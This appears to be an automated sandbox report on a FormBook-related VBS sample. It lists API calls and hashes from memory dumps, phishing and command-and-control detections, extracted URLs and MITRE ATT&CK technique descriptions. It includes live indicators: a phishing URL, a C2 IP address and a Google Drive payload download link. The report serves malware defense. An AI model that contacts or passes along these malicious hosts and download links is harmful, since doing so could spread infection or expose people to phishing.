Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 8b54d8f6fcf166343fe0f1cb7b6668b225a99eaafb5df20d5bc75a8832c8b8a6
Instruction ID: be30c7dc5f63564c7e637ac69d7b9b651474ffeaef8bac742e218ce03bd23b03
Opcode Fuzzy Hash: 8b54d8f6fcf166343fe0f1cb7b6668b225a99eaafb5df20d5bc75a8832c8b8a6
Instruction Fuzzy Hash: 133133B5A006099FDB10DFD8D8809EFB7B9FF88304B508599E506EB214D775EE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B1524C Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02B15267

Strings

@J7<, xrefs: 02B1527B

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 93ab156a671de2ca1b51931ea518a139cd193958adedd3617bac83684c6c82c6
Instruction ID: c2455c247fdea48047585229408a56b4d7e5a5dea86d262ee7a3cdddf2746c98
Opcode Fuzzy Hash: 93ab156a671de2ca1b51931ea518a139cd193958adedd3617bac83684c6c82c6
Instruction Fuzzy Hash: FC313475A006099FDB10DFD8D8809EFB7B9FF88304B508599E505EB214D775EE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B0B150 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02B0B1C2

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: fca772f767bb301195cf8b17596f019d3814ec7e456b00c27314cf6273965a4a
Instruction ID: 14486b34b95fba799e69e1212c0a1b6c3458e91fabd4226f37f585d0053ca2d6
Opcode Fuzzy Hash: fca772f767bb301195cf8b17596f019d3814ec7e456b00c27314cf6273965a4a
Instruction Fuzzy Hash: 81015EB9E0020DBBDF10DBA0DC81FAEB7789B14308F0041E4A90C97281F630EB44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B1B630 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,3707C6C5,00000000,00000000,02B0DDC2,?,?,?,3707C6C5,?), ref: 02B1B672

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d20725191c87107ba6351a9b9cbc50f5ac02fdfec83ff9e3cea56c8375d1a17c
Instruction ID: 229f83e2ac75c336d401376f88c87143a4fa4f3e761285843fd5aad436bfa4dd
Opcode Fuzzy Hash: d20725191c87107ba6351a9b9cbc50f5ac02fdfec83ff9e3cea56c8375d1a17c
Instruction Fuzzy Hash: 59F06D733902143AE32061A99C02FDBB78DDB91B61F1400A9FB0CEB2C1E996B40146E9

Uniqueness

Uniqueness Score: -1.00%

Function 02B0E7B0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(02B14262,?,?,02B14262,00000000,?), ref: 02B0E7DA

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e5bef1997f6aeae5a4a202901e1d255b842bd680525f30c7be0e67d2bcc2f47d
Instruction ID: f733efe7fd54e996d7ddd396c6b998502feebf7a0b49a122dcd17ebaa636afcf
Opcode Fuzzy Hash: e5bef1997f6aeae5a4a202901e1d255b842bd680525f30c7be0e67d2bcc2f47d
Instruction Fuzzy Hash: 5FE0267920020427FB2166A89C81F66335CCB4C628F084A90FA1DCB3C2E634F4018254

Uniqueness

Uniqueness Score: -1.00%

Function 02B1CAA0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,BCB48B9C,00000000,?), ref: 02B1CACD

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
Instruction ID: b7beb63b636953aa7002383295ef42cd8e75b1a243b7569d2f8cb0b002bb1a34
Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
Instruction Fuzzy Hash: E8E012B1200218ABCB18EF89DC49EA737ADAF88750F018458FA095B281C630F910CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 02B1CC00 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02B0E102,02B0E102,?,00000000,?,?), ref: 02B1CC30

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 089838e15c42aa9280ca487162388d1d26107ae16896743c296fd4e3f42045f6
Instruction ID: b7553f7537e58671a9f614ee018f6632862d762b1cce14940e00b7cdb44989a9
Opcode Fuzzy Hash: 089838e15c42aa9280ca487162388d1d26107ae16896743c296fd4e3f42045f6
Instruction Fuzzy Hash: 88E01AB12002146BDB14DF49CC45EE777ADAF89654F018454FA0857242C630F8108BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02B0E5B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02B08D8A,?), ref: 02B0E5E1

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 50b0c3c9f46d8bab258575eec99ee3bc6c356f56f1217a6eea750e7d39699f9f
Instruction ID: acae18e4dd24c6df65aa47103715f96208d55adfbb3f336f16f8c5f95f8bb639
Opcode Fuzzy Hash: 50b0c3c9f46d8bab258575eec99ee3bc6c356f56f1217a6eea750e7d39699f9f
Instruction Fuzzy Hash: 58D05E756802043BFA25A6E59C46F1A368D9B04750F044494F90CE73C2EE54F5004665

Uniqueness

Uniqueness Score: -1.00%

Function 02B0E5B4 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02B08D8A,?), ref: 02B0E5E1

Memory Dump Source

Source File: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b00000_cmd.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c102c2e7abaf09f8c96c3238bcef12b7fa82feaec156d2db9dff6fb7f1054a31
Instruction ID: bba22fc0149cdc791045257e9fe5a87dda634574ad35186a05fb5757a6203126
Opcode Fuzzy Hash: c102c2e7abaf09f8c96c3238bcef12b7fa82feaec156d2db9dff6fb7f1054a31
Instruction Fuzzy Hash: ECD05E72A842012FFB12DBB49C46F5A3A989F49300F1444E9F50CDB3C2FA60E2408794

Uniqueness

Uniqueness Score: -1.00%

Function 0301967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03019694

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d02f71d1876e036c90af6eefe737abed0da4f9a7162962365f0374d94cfa7714
Instruction ID: 38b230869e4ab908c7dabc558cca92ffe5206557efbc1efe82bf426ea57899cc
Opcode Fuzzy Hash: d02f71d1876e036c90af6eefe737abed0da4f9a7162962365f0374d94cfa7714
Instruction Fuzzy Hash: 06B09B719035D5C5D651D76046087177E4477D0751F36C051D2120641A4778C491F6F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0306FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0306FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0301CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03065720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03065720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0306fdda
0x0306fde2
0x0306fde5
0x0306fdec
0x0306fdfa
0x0306fdff
0x0306fe0a
0x0306fe0f
0x0306fe17
0x0306fe1e
0x0306fe19
0x0306fe19
0x0306fe19
0x0306fe20
0x0306fe21
0x0306fe22
0x0306fe25
0x0306fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0306FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0306FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0306FE01

Memory Dump Source

Source File: 00000011.00000002.781495771.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: true

Associated: 00000011.00000002.781495771.00000000030CB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.781495771.00000000030CF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2fb0000_cmd.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: dd7cde254f5c34a678d84620f60674126bc999cacb60df99f78bc608e46e9619
Instruction ID: 69dd4d18d95f782abd36ad36e0c1d10c3f4c17c9ac73fa8948f435b18b96270b
Opcode Fuzzy Hash: dd7cde254f5c34a678d84620f60674126bc999cacb60df99f78bc608e46e9619
Instruction Fuzzy Hash: 8FF0F636240602BFE6209A55EC02F67BF5AEB85770F240314F6285A5D1DA62F93086F0

Uniqueness

Uniqueness Score: -1.00%

Source: http://www.bebas88official.click/g0c0/	Avira URL Cloud: Label: phishing
Source: http://www.bebas88official.click/g0c0/?J1ZahCdL=7AoghRD8g0/kfvEsx2sU95A2LZSx6NsCVfQQj+6UBm4+ru4nOpfQ9Q9UKAYKj24R1kRNFhy6UoFNSsJ6pUxzKJj896DDYPcMBEzuDMgRmTEe&uEk=kKVhb1ODb	Avira URL Cloud: Label: phishing

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 162.0.236.127:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 162.0.236.127:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49741 -> 162.0.236.127:80

Source: wscript.exe, 00000000.00000003.254388912.0000026B154B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.267192402.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265026295.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266039874.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265653737.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.253741610.0000026B17201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTr
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.254388912.0000026B154B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.253741610.0000026B17201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000003.254388912.0000026B154B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.266860344.0000026B154B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265284479.0000026B154B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.490902503.000002C002C39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.8
Source: wscript.exe, 00000000.00000003.254388912.0000026B154B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.267192402.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265026295.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266039874.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265653737.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.253741610.0000026B17201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeSta0
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.254388912.0000026B154B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.253741610.0000026B17201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.266860344.0000026B154B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265284479.0000026B154B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.256705348.0000026B1735A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259335492.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.258588650.0000026B17357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0587174e1d1d6
Source: wscript.exe, 00000000.00000003.254388912.0000026B154B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.253741610.0000026B17201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.254388912.0000026B154B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.267192402.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265026295.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266039874.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265653737.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.253741610.0000026B17201000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000001.00000002.493569839.000002C002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ieinstal.exe, 0000000D.00000002.535185369.0000000021C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1rIzD7daHU1mUfnDyXK-I-Gb1F3sb7xu2

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi		17_2_02B08D70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 4x nop then pop edi		17_2_02B08D6F

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report GlobalImagingDocuments9575734549684.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

